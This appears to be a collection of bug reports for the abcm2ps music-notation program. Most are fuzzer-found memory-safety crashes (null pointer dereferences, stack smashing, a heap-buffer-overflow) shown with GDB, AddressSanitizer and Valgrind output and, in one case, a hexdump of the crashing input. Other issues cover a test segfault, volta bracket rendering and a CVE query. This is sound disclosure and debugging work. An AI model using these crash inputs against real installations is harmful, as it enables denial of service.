#2 0x000000000052ffd5 in output_music (indent=0) at music.c:5088
#3 0x000000000052ffd5 in output_music () at music.c:5139
#4 0x000000000054d511 in generate () at parse.c:1039
#5 0x00000000005709cd in do_tune (eob=0) at parse.c:1060
#6 0x00000000005709cd in do_tune () at parse.c:3620
#7 0x0000000000414731 in abc_eof () at abcparse.c:200
#8 0x00000000004e45e9 in frontend (s=,
s@entry=0x827a40 "&&\rX:MPRe\a:K:\a\ae]\377:K:\a>K\005\377\377\005]E\rKPRe\a:e\aenE.PRe\rPRee\\a:&&Y]E\rt\177f\a:e]E\rK:vE\r:Re\334a:K:e\ae]E\rPRe\a:6&ae]E]\005\377\377:K:\a>K\005\377\377\005]E\rKPRe\a:e\aenE.PRe\rPRee\\a:"&Y]E\re\a:e\aenE.PRe\rPRea:P\177f\a:enK:e\E0K>]E\rK>"..., ftype=ftype@entry=0, fname=fname@entry=0x825ea0 "POC5", linenum=35, linenum@entry=0) at front.c:901
#9 0x000000000040b98d in treat_file (fn=, ext=) at abcm2ps.c:239
#10 0x00000000004084f9 in main (argc=0, argv=) at abcm2ps.c:1040
(gdb) list
1200 if (s->u.bar.len != 0) {
1201 struct SYMBOL *s2;
1202
1203 set_scale(s);
1204 if (s->u.bar.len == 1) {
1205 for (s2 = s->prev; s2->abc_type != ABC_T_REST; s2 = s2->prev)
1206 ;
1207 putxy(s2->x, yb + 12);
1208 a2b("mrep\n");
1209 } else {
https://drive.google.com/open?id=1HE9cht7WJPauA66acyJrEywXX8R4Hg-2
(gdb) set args POC2
(gdb) r
Starting program: /home/afl/parse/eval/abcm2ps/new_ver/abcm2ps/abcm2ps POC2
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
abcm2ps-8.13.20 (2018-02-21)
File POC2
POC2:6:2: error: Bad character
6 [1�
^
POC2:6:3: error: Bad character
6 [1�
^
*** stack smashing detected ***: /home/afl/parse/eval/abcm2ps/new_ver/abcm2ps/abcm2ps terminated
Program received signal SIGABRT, Aborted.
0x00007ffff68bc428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54
54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0 0x00007ffff68bc428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54
#1 0x00007ffff68be02a in __GI_abort () at abort.c:89
#2 0x00007ffff68fe7ea in __libc_message (do_abort=do_abort@entry=1, fmt=fmt@entry=0x7ffff6a1649f "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:175
#3 0x00007ffff69a015c in __GI___fortify_fail (msg=,
msg@entry=0x7ffff6a16481 "stack smashing detected") at fortify_fail.c:37
#4 0x00007ffff69a0100 in __stack_chk_fail () at stack_chk_fail.c:28
#5 0x0000000000546f05 in get_key (s=s@entry=0x82a828) at parse.c:4081
#6 0x00000000005684c8 in get_info (s=s@entry=0x82a828) at parse.c:2882
#7 0x0000000000574348 in do_tune () at parse.c:3484
#8 0x0000000000414731 in abc_eof () at abcparse.c:200
#9 0x00000000004e45e9 in frontend (s=,
s@entry=0x827ea0 "C>ZE\rC3\356E\rX:\374\rK:P>b_g=C&C,f\347(C&C\250:5ZV"Cx\001E\rw:\347\r[1\233", ftype=ftype@entry=0, fname=fname@entry=0x827ee0 "POC2", linenum=6, linenum@entry=0) at front.c:901
#10 0x000000000040b98d in treat_file (fn=, ext=) at abcm2ps.c:239
#11 0x00000000004084f9 in main (argc=0, argv=) at abcm2ps.c:1040
Null Pointer Dereference vulnerability is discovered in the abcm2ps (8.14.1-master).
Tested environment : 64-bit ubuntu 16.04 LTS
Affected version : 8.14.1-master
Command -
./abcm2ps -E -g -x -v -O fff -O = -i -k 1 $POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10
Vulnerable code :
s->next = s2;
s->prev = s2->prev;
-> s->prev->next = s;
s2->prev = s;
s->ts_next = s2;
Debug:
GDB :
0x00000000004a095d in set_bar_num () at parse.c:921
921 s->prev->next = s;
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ registers ]────
$rax : 0x0
$rbx : 0x7fffffffda00 → 0x0000000041b58ab3
$rcx : 0x0
$rdx : 0x62900000bbd0 → 0x000062900000be28 → 0x000062900000c080 → 0x000062900000c2d0 → 0x000062900000c520 → 0x000062900000c770 → 0x000062900000c9c0 → 0x000062900000cc18
$rsp : 0x7fffffffd870 → 0x0000000000000000
$rbp : 0x7fffffffd8b0 → 0x00007fffffffd8d0 → 0x00007fffffffd8f0 → 0x00007fffffffd940 → 0x00007fffffffd970 → 0x00007fffffffd990 → 0x00007fffffffda80 → 0x00007fffffffdac0
$rsi : 0x0
$rdi : 0x3
$rip : 0x4a095d → <set_bar_num+1916> mov QWORD PTR [rax+0x10], rdx
$r8 : 0x0
$r9 : 0xc52800003e2 → 0x0000000000000000
$r10 : 0x1
$r11 : 0x246
$r12 : 0xffffffffb40 → 0x0000000000000000
$r13 : 0x7fffffffda60 → 0x00007fffffffdb80 → 0x0000000041b58ab3
$r14 : 0x7fffffffda00 → 0x0000000041b58ab3
$r15 : 0x7fffffffdb80 → 0x0000000041b58ab3
$eflags: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$fs: 0x0000 $ds: 0x0000 $ss: 0x002b $gs: 0x0000 $es: 0x0000 $cs: 0x0033
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ stack ]────
0x00007fffffffd870│+0x00: 0x0000000000000000 ← $rsp
0x00007fffffffd878│+0x08: 0x0000060000000600 → 0x0000000000000000
0x00007fffffffd880│+0x10: 0x0000000100000001 → 0x0000000000000000
0x00007fffffffd888│+0x18: 0x00000ffffffffb40 → 0x0000000000000000
0x00007fffffffd890│+0x20: 0x000062900000bbd0 → 0x000062900000be28 → 0x000062900000c080 → 0x000062900000c2d0 → 0x000062900000c520 → 0x000062900000c770 → 0x000062900000c9c0
0x00007fffffffd898│+0x28: 0x000062900000b728 → 0x000062900000b978 → 0x000062900000bbd0 → 0x000062900000be28 → 0x000062900000c080 → 0x000062900000c2d0 → 0x000062900000c520
0x00007fffffffd8a0│+0x30: 0x00007fffffffd8b0 → 0x00007fffffffd8d0 → 0x00007fffffffd8f0 → 0x00007fffffffd940 → 0x00007fffffffd970 → 0x00007fffffffd990 → 0x00007fffffffda80
0x00007fffffffd8a8│+0x38: 0x000000000049f3e9 → <system_init+19> nop
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ code:i386:x86-64 ]────
0x4a0951 <set_bar_num+1904> mov rdi, rdx
0x4a0954 <set_bar_num+1907> call 0x402c90 <__asan_report_store8@plt>
0x4a0959 <set_bar_num+1912> mov rdx, QWORD PTR [rbp-0x20]
→ 0x4a095d <set_bar_num+1916> mov QWORD PTR [rax+0x10], rdx
0x4a0961 <set_bar_num+1920> mov rax, QWORD PTR [rbp-0x18]
0x4a0965 <set_bar_num+1924> mov rdx, QWORD PTR [rbp-0x20]
0x4a0969 <set_bar_num+1928> mov QWORD PTR [rax+0x18], rdx
0x4a096d <set_bar_num+1932> mov rax, QWORD PTR [rbp-0x20]
0x4a0971 <set_bar_num+1936> mov rdx, QWORD PTR [rbp-0x18]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ source:parse.c+921 ]────
916 s->prev->next = s->next;
917 s->ts_next->ts_prev = s->ts_prev;
918 s->ts_prev->ts_next = s->ts_next;
919 s->next = s2;
920 s->prev = s2->prev;
// s=0x00007fffffffd890 → [...] → 0x000062900000c9c0
→ 921 s->prev->next = s;
922 s2->prev = s;
923 s->ts_next = s2;
924 s->ts_prev = s2->ts_prev;
925 s->ts_prev->ts_next = s;
926 s2->ts_prev = s;
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]────
[#0] Id 1, Name: "abcm2ps", stopped, reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]────
[#0] 0x4a095d → Name: set_bar_num()
[#1] 0x4a1346 → Name: generate()
[#2] 0x4a16eb → Name: gen_ly(eob=0x0)
[#3] 0x4b45a0 → Name: do_tune()
[#4] 0x407292 → Name: abc_parse(p=0x625000000100 "", fname=0x606000000a40 "POC", ln=0xe)
[#5] 0x46a4ad → Name: txt_add_eos(fname=0x606000000a40 "POC", linenum=0xe)
[#6] 0x46d6b0 → Name: frontend(s=0x61f0000001f1 "\nX:2\nT:Key signature change\nT:and multi-measure rest\nM:2\nL:1/4\nK:C\nZ4|\"C\"CEGc|[K:A]\"A\"Acea|[K:B]\"B\"Bdfb|[K:A]\"A\"Acea|\n[K:Eb]\"Eb\"EGBe|[K:Cb]\"Cb\"CEGc|[K:C]\"C\"CEGc|\n\nX:3\nT:All clefs with max signatures\nM:C\nL:1/4\nK:C# bass\nC,E,G,C|[K:Cb]C,E,G,C|[K:C# bass3]C,E,G,C|\n[K:Cb]C,E,G,C|[K:C# alto4]G,CEG|[K:Cb]G,CEG|\n[K:C# alto]G,CEG|[K:Cb]G,CEG|[K:C# alto2]CEGc|\n[K:Cb]CEGc|[K:C# alto1]CEGc|[K:Cb]CEGc|\n[K:C# treble]CEGc|[K:Cb]CEGc|[K:C]CEGc|\n\nX:4\nT:Guitar chords - annotations\nM:none\nL:1/4\nK:C\n\"^no time\"\"^signature\"CD\"gchord\"\"^on bar\"|EF\\\n\"^appogiattura\"{B}c \"^acciaccatura\"{/B}c \\\n\"^three;annot;lines\"G \"^and\"\"^four\"\"^annot\"\"^lines!\"c| \\\n\"^Fa#\"^F \"^Sib\"_B \"^Fa=\"=F \\\n\"F#\"^F \"Bb\"_B||\n\nX:5\nT:Standard decorations\nM:none\nL:1/8\nK:C\n~C.D JENF HCRD TEuF vcLB MAPG ScOB|\nw: \\~ . J N H R T u v L M P S O\nw: grace dot slide tenuto fermata roll trill upbow downbow \\\nw: emphasis lmordent umordent segno coda\n\nX:6\nT:All decorations\nM:none\nL:1/8\nK:C\n!0!C!1!D !2!E!3!F !4!G!5!A !+!B!accent!c|\\\nw:~0 ~1 ~2 ~3 ~4 ~5 ~+ accent\n!breath!C!crescendo(!D !crescendo)!E!D.C.!F !diminuendo(!G!diminuendo)!A !f!B!ffff!c|\nw:breath crescendo( crescendo) D.C. diminuendo( diminuendo) ~f ffff\n!fine!C!invertedfermata!D !longphrase!E !mediumphrase!F !mf!G!open!A !p!B!pppp!c|\nw:fine invertedfermata longphrase mediumphrase mf open ~p pppp\n!pralltriller!C!sfz!D !shortphrase!E !snap!F !thumb!G!turn!A!wedge!B!D.S.!c|\nw:pralltriller sfz shortphrase snap thumb turn wedge D.S.\n\nX:7\nT:Non standard decorations\nC:Composer\nO:Origin\nR:Rhythm\nM:none\nL:1/8\nK:C\n!turnx!G!invertedturn!A !invertedturnx!B !arpeggio![EGc]|\\\nw:turnx invertedturn invertedturnx arpeggio\n!trill(!c4-|!trill)!c3|\nw:trill( trill)\n\nX:8\nT:Decorations on two voices\nT:(also in 'd:' lines)\n%%infoline 1\nC:Composer\nO:Origin\nR:Rhythm\nM:C\n%%staves (1 2)\nK:C\nV:1\n ~c.dJeNf cdef|aabc' gabc'|!coda!cdef gfec||\nd: * * * * HRTu|!mf! |!sfz! *** ***!D.S.!\nV:2\n CDEF CDEF|ffga efga|C D EF [EG]FEC||\nd: ~.JN HRTu|~.JN HRTu|!5!!4!M* !5! M\nd:", ' ' <repeats 13 times>, "|", ' ' <repeats 11 times>, "|* P !3! !4!\n\nX:9\nT:Beams\nL:1/16\nM:4/4\nK:C\n(3CDE(3FGA B/c/d/e/d/c/B/A/ (3zDE(3FGz z/c/d/e/d/c/B/z/|(3CDz(3zGA B/c/d/z/z/c/B/A/ G8|\n\nX:10\nT:Voice overlap\nT:invisible and dashed bars\nM:2/4\nL:1/8\n%%staves (1 2)\nK:C\nV:1\nFEDC:GGGG|G2 G2|c4[|]GABc|\nV:2\nGABc:FEDC|GD G>D|cBAG[|]G4|\n\nX:11\nT:Clef transpositions\nM:C\nL:1/4\nK:C\n%%titleleft 1\nT:No transposition\n\"^clef=treble\"\"A,\"A,\"B,\"B,\"C\"C\"D\"D|\\\n[K:alto]\"^alto\"\"A,\"A,\"B,\"B,\"C\"C\"D\"D|\\\n[K:bass]\"^bass\"\"A,\"A,\"B,\"B,\"C\"C\"D\"D|\nT:abc2ps compatible clef transposition\n%%abc2pscompat 1\n[K:treble]\"^treble\"\"A,\"A,\"B,\"B,\"C\"C\"D\"D|\\\n[K:alto]\"^alto\"\"A\"A\"B\"B\"c\"c\"d\"d|\\\n[K:bass]\"^bass\"\"a\"a\"b\"b\"c'\"c'\"d'\"d'|\n%%titleleft 0\n", ftype=0x0, fname=0x606000000a40 "POC", linenum=0xe)
[#7] 0x403a4a → Name: treat_file(fn=0x7fffffffe21e "POC", ext=0x4ec860 "abc")
[#8] 0x403b5e → Name: treat_abc_file(fn=0x7fffffffe21e "POC")
[#9] 0x40647f → Name: main(argc=0x17, argv=0x7fffffffddb8)
gef➤ p s->prev
$1 = (struct SYMBOL *) 0x0
gef➤ p *s->prev
Cannot access memory at address 0x0
Reproducer file - Reproducer
There seems to be a bug in running the test with sample4.abc, it consistently throws this error when running make test:
❯❯❯ ./abcm2ps -S -O sample4.ps sample4.abc
File sample4.abc
[1] 28843 segmentation fault (core dumped) ./abcm2ps -S -O sample4.ps sample4.abcFor a full log, check here: https://travis-ci.org/leesavide/abcm2ps/builds/253747134
Any ideas what might be happening with this one?
If the second or subsequent endings are longer than the first ending, the volta bracket above the longer endings is only as long as the first ending. Sample ABC to reproduce:
X:1
T:Volta test
L:1/4
K:C
|: ABCD |1 EFGA :|2 BCDE | FGAB :|3 CDEF | GABC || DEFG |]
There should be volta brackets above the second measures of the second and third endings, but only the first measure gets them, presumably because the first ending only has one measure:
If you insert an invisible bar in the first ending, then the other endings get the right length for their volta brackets:
|: ABCD |1 EFGA [|] :|2 BCDE | FGAB :|3 CDEF | GABC || DEFG |]
The standard says of multiple endings that:
The Nth ending starts with [N and ends with one of ||, :| |] or [|.
So it seems like each ending should be allowed an independent length, rather than being based on the first ending.
If I can figure out how volta brackets are being calculated and displayed, I'll try to write a patch, but I'm not much of a programmer.
Null Pointer Dereference vulnerability is discovered in the abcm2ps (8.14.1-master).
Tested environment : 64-bit ubuntu 16.04 LTS
Affected version : 8.14.1-master
Command -
./abcm2ps -E -g -x -v -O fff -O = -i -k 1 $POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10
Vulnerable code :
for (p_voice = first_voice; p_voice; p_voice = p_voice->next) {
int bar_start;
voice = p_voice - voice_tb;
if (last_s->voice == voice && last_s->type == BAR) {
p_voice->last_sym = last_s;
last_s = last_s->ts_next;
continue;
}
Debug:
GDB :
Program received signal SIGSEGV, Segmentation fault.
[ Legend: Modified register | Code | Heap | Stack | String]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ registers ]────
$rax : 0x0
$rbx : 0x5555557cc240 → 0x0000000000000031 ("1"?)
$rcx : 0x555555876538 → 0x0000000000000000
$rdx : 0x0
$rsp : 0x7fffffffdbb0 → 0x00000000ffffdbc0
$rbp : 0x7fffffffdd00 → 0x0101010101010101
$rsi : 0x5555557c39a0 → 0x00005555557dabc8 → 0x0000000000000000
$rdi : 0x5555557db7a8 → 0x0000000000000000
$rip : 0x555555582a65 → <output_music+6885> movzx edx, BYTE PTR [r12+0x3a]
$r8 : 0x5555557c39a0 → 0x00005555557dabc8 → 0x0000000000000000
$r9 : 0x0
$r10 : 0x0
$r11 : 0x1
$r12 : 0x0
$r13 : 0x5555557cc440 → 0x0000000000000032 ("2"?)
$r14 : 0x0
$r15 : 0xff000000ff
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$ss: 0x002b $cs: 0x0033 $gs: 0x0000 $fs: 0x0000 $ds: 0x0000 $es: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ stack ]────
0x00007fffffffdbb0│+0x00: 0x00000000ffffdbc0 ← $rsp
0x00007fffffffdbb8│+0x08: 0x00005555557c39a0 → 0x00005555557dabc8 → 0x0000000000000000
0x00007fffffffdbc0│+0x10: 0x00007fffffffdce0 → 0x0101010101010101
0x00007fffffffdbc8│+0x18: 0x00005555557c39a0 → 0x00005555557dabc8 → 0x0000000000000000
0x00007fffffffdbd0│+0x20: 0x43bd000042f80000
0x00007fffffffdbd8│+0x28: 0x000055555585fab0 → 0x000055555585fd00 → 0x000055555585ff50 → 0x00005555558601a0 → 0x00005555558688e8 → 0x0000555555868b38 → 0x0000555555868d88
0x00007fffffffdbe0│+0x30: 0x00007fffffffdcf0 → 0x0101010101010101
0x00007fffffffdbe8│+0x38: 0x00007fffffffdce0 → 0x0101010101010101
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ code:i386:x86-64 ]────
0x555555582a58 <output_music+6872> mov r13, QWORD PTR [r13+0x10]
0x555555582a5c <output_music+6876> test r13, r13
0x555555582a5f <output_music+6879> je 0x555555582870 <output_music+6384>
→ 0x555555582a65 <output_music+6885> movzx edx, BYTE PTR [r12+0x3a]
0x555555582a6b <output_music+6891> mov rax, r13
0x555555582a6e <output_music+6894> sub rax, rbx
0x555555582a71 <output_music+6897> sar rax, 0x9
0x555555582a75 <output_music+6901> cmp eax, edx
0x555555582a77 <output_music+6903> jne 0x555555582950 <output_music+6608>
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ source:music.c+3323 ]────
3318 for (p_voice = first_voice; p_voice; p_voice = p_voice->next) {
3319 int bar_start;
3320
3321 // if bar already, keep it in sequence
3322 voice = p_voice - voice_tb;
→ 3323 if (last_s->voice == voice && last_s->type == BAR) {
3324 p_voice->last_sym = last_s;
3325 last_s = last_s->ts_next;
3326 continue;
3327 }
3328
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]────
[#0] Id 1, Name: "abcm2ps", stopped, reason: SIGSEGV
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]────
[#0] 0x555555582a65 → Name: init_music_line()
[#1] 0x555555582a65 → Name: set_piece()
[#2] 0x555555582a65 → Name: output_music()
[#3] 0x5555555886c1 → Name: generate()
[#4] 0x555555588c38 → Name: gen_ly(eob=0x0)
[#5] 0x55555558eab8 → Name: do_tune()
[#6] 0x555555560ce2 → Name: abc_parse(p=0x5555557ddbb0 "", fname=0x5555557f7f10 "abcm2ps_output/crashes/crash4062", ln=0x65)
[#7] 0x555555578c14 → Name: txt_add_eos(fname=0x5555557f7f10 "abcm2ps_output/crashes/crash4062", linenum=0x65)
[#8] 0x5555555790a4 → Name: frontend(s=<optimized out>, ftype=<optimized out>, fname=<optimized out>, linenum=<optimized out>)
[#9] 0x55555555c0bd → Name: treat_file(fn=0x7fffffffe66a "abcm2ps_output/crashes/crash4062", ext=<optimized out>)
──────────────────────────────
init_music_line () at music.c:3323
3323 if (last_s->voice == voice && last_s->type == BAR) {
gef➤ p last_s
$1 = (struct SYMBOL *) 0x0
gef➤ i r
rax 0x0 0x0
rbx 0x5555557cc240 0x5555557cc240
rcx 0x555555876538 0x555555876538
rdx 0x0 0x0
rsi 0x5555557c39a0 0x5555557c39a0
rdi 0x5555557db7a8 0x5555557db7a8
rbp 0x7fffffffdd00 0x7fffffffdd00
rsp 0x7fffffffdbb0 0x7fffffffdbb0
r8 0x5555557c39a0 0x5555557c39a0
r9 0x0 0x0
r10 0x0 0x0
r11 0x1 0x1
r12 0x0 0x0
r13 0x5555557cc440 0x5555557cc440
r14 0x0 0x0
r15 0xff000000ff 0xff000000ff
rip 0x555555582a65 0x555555582a65 <output_music+6885>
eflags 0x10202 [ IF RF]
cs 0x33 0x33
ss 0x2b 0x2b
ds 0x0 0x0
es 0x0 0x0
fs 0x0 0x0
gs 0x0 0x0
Reproducer file - Reproducer
Reproducer: abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc.zip (SHA1: 292bad90a19bc9dc8a61729daef4e76550d39347)
Tested in: 070cfe6
Fuzzing tool used: afl-2.52b
00000000 58 3a 30 0a 54 3a 20 20 20 20 20 20 20 30 30 30 |X:0.T: 000|
00000010 0a 92 30 30 30 30 30 30 30 30 30 30 30 30 30 80 |..0000000000000.|
00000020 30 30 30 30 30 30 0a 20 20 30 30 30 30 30 30 30 |000000. 0000000|
00000030 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|
*
00000050 30 30 30 30 8e 30 30 30 30 30 30 30 30 30 30 30 |0000.00000000000|
00000060 0a 4b 3a 47 0a 92 22 30 30 30 30 30 22 30 22 22 |.K:G.."00000"0""|
00000070 22 22 22 22 3a 30 30 bb 30 7c 40 7c 7c 7c 67 32 |"""":00.0|@|||g2|
00000080 67 81 20 4a 30 64 32 30 66 32 22 30 22 22 22 22 |g. J0d20f2"0""""|
00000090 22 22 30 30 30 30 30 30 30 30 30 30 30 30 0a 4d |""000000000000.M|
000000a0 3a 34 2f 34 |:4/4|
000000a4
./src/abcm2ps/abcm2ps abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc
abcm2ps-8.13.20 (2018-02-21)
File abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:0: error: Bad character
6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:1: error: Bad character
6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:9: error: Bad character
6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:19: error: Bad character
6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:20: error: Bad character
6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:21: error: Bad character
6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:23: error: Bad character
6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:30: error: Bad character
6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:31: error: Bad character
6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:34: error: Bad character
6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
^
abcm2ps-heap-buffer-overflow-parse.c-do_tune.abc:6:60: error: No end of guitar chord
6 "00000"0"""""":00»0|@|||g2g J0d20f2"0""""""000000000000
^
=================================================================
==23434==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250000000e0 at pc 0x55aaafbb5fc8 bp 0x7ffc649ef9e0 sp 0x7ffc649ef9d8
READ of size 1 at 0x6250000000e0 thread T0
#0 0x55aaafbb5fc7 in do_tune /home/hsalo/src/abcm2ps/parse.c:3482
#1 0x55aaafa239b0 in abc_eof /home/hsalo/src/abcm2ps/abcparse.c:200
#2 0x55aaafafddf8 in frontend /home/hsalo/src/abcm2ps/front.c:905
#3 0x55aaafa1bf3e in treat_file /home/hsalo/src/abcm2ps/abcm2ps.c:239
#4 0x55aaafa182b6 in main /home/hsalo/src/abcm2ps/abcm2ps.c:1040
#5 0x7fc6e08642e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0)
#6 0x55aaafa1a649 in _start (/home/hsalo/src/abcm2ps/abcm2ps+0x37649)
0x6250000000e0 is located 32 bytes to the left of 8222-byte region [0x625000000100,0x62500000211e)
allocated by thread T0 here:
#0 0x7fc6e0fa8d28 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.3+0xc1d28)
#1 0x55aaafa1eba1 in getarena /home/hsalo/src/abcm2ps/abcm2ps.c:1105
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/hsalo/src/abcm2ps/parse.c:3482 in do_tune
Shadow bytes around the buggy address:
0x0c4a7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c4a7fff8010: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa
0x0c4a7fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==23434==ABORTING
Hi
Recently there was a CVE assigned, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1010011 with two references:
Did you got a notice on it? Was this already fixed? (any reference to share?)
Tested environment : 64-bit ubuntu 16.04 LTS
Affected version : 8.14.1-master
Command :
./abcm2ps r -E -g -x -v -O fff -O = -i -k 1 $POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10
s2 = de->s;
de1 = de->start;
if (de1) {
s = de1->s;
x = s->x + 3;}
Debug:
GDB :
de1 = de->start;
s = de1->s;
x = s->x + 3;
// } else { /* end without start */
// if (!first_note) {
// dd = &deco_def_tb[de->t];
// error(1, s2, "No start of deco !%s!", dd->name);
────────────────────────────────────────────────────────────────────────────────────────────────────────
[#0] Id 1, Name: "abcm2ps", stopped, reason: SIGSEGV
────────────────────────────────────────────────────────────────────────────────────────────────────────
[#0] 0x555555567141 → d_cresc(de=0x5555557eb610)
[#1] 0x5555555698e8 → draw_deco_staff()
[#2] 0x555555572d48 → draw_sym_near()
[#3] 0x555555583dbd → delayed_output(indent=0)
[#4] 0x555555583dbd → output_music()
[#5] 0x555555589501 → generate()
[#6] 0x555555589a78 → gen_ly(eob=0x0)
[#7] 0x55555558f8f8 → do_tune()
[#8] 0x555555561a52 → abc_parse(p=0x5555557f4a20 "", fname=0x5555557f39f0 "POC", ln=0x16b)
[#9] 0x555555579a54 → txt_add_eos(fname=0x5555557f39f0 "POC", linenum=0x16b)
gef➤ p de1
$1 = (struct deco_elt *) 0x0
gef➤ p *de1
Cannot access memory at address 0x0
gef➤ p *de1->s
Cannot access memory at address 0x10
gef➤ i r
rax 0x1 0x1
rbx 0x5555557eb610 0x5555557eb610
rcx 0x1b 0x1b
rdx 0xc0 0xc0
rsi 0x1 0x1
rdi 0x5555557eb610 0x5555557eb610
rbp 0x5555557be800 0x5555557be800 <deco_def_tb+96>
rsp 0x7fffffffd4c0 0x7fffffffd4c0
r8 0x0 0x0
r9 0x5555557eb610 0x5555557eb610
r10 0x0 0x0
r11 0x5555557e8390 0x5555557e8390
r12 0x0 0x0
r13 0x5555557be7a0 0x5555557be7a0
r14 0x0 0x0
r15 0x5555557c5760 0x5555557c5760
rip 0x555555567141 0x555555567141 <d_cresc+49>
eflags 0x10202 [ IF RF ]
cs 0x33 0x33
ss 0x2b 0x2b
ds 0x0 0x0
es 0x0 0x0
fs 0x0 0x0
gs 0x0 0x0
Valgrind :
Process terminating with default action of signal 11 (SIGSEGV)
Access not within mapped region at address 0x10
at 0x11B141: d_cresc (deco.c:359)
by 0x11D8E7: draw_deco_staff (deco.c:1908)
by 0x126D47: draw_sym_near (draw.c:4216)
by 0x137DBC: delayed_output (music.c:5085)
by 0x137DBC: output_music (music.c:5140)
by 0x13D500: generate (parse.c:1039)
by 0x13DA77: gen_ly (parse.c:1060)
by 0x1438F7: do_tune (parse.c:3633)
by 0x115A51: abc_parse (abcparse.c:177)
by 0x12DA53: txt_add_eos (front.c:379)
by 0x12DEE3: frontend (front.c:891)
